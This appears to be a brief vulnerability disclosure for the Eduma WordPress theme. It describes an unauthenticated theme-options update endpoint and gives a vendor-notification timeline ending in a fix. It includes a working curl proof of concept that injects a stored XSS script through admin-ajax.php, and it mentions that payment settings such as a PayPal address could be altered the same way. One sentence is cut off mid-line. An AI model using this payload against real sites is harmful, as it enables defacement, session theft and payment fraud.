Education WP 18.104.22.168 aka Eduma suffers from a somewhat common issue: exposed theme options endpoint.
Avada basically had the same type of issue, and most of WordPress Theme and Plugin related issues boils down to an option or setting.
The POC is pretty simple, it updates one of the theme options called
Of course, when all of the options or settings are exposed there are other things that can be done, like changing a PayPal address etc, so it is pretty dangerous.
Stored XSS POC
curl -D- 'http://127.0.0.1/wp-admin/admin-ajax.php' --data "action=thim_update_theme_mods&thim_key=thim_google_analytics&thim_value=XXXX</script><script>alert(1337)</script><scrtipt>"
23 - 04 - 2017 - Vulnerability discovered 23 - 04 - 2017 - Vendor notified 27 - 04 - 2017 - Vendor fixed the issues in 3.0.7 08 - 05 - 2017 - Vulnerability goes public.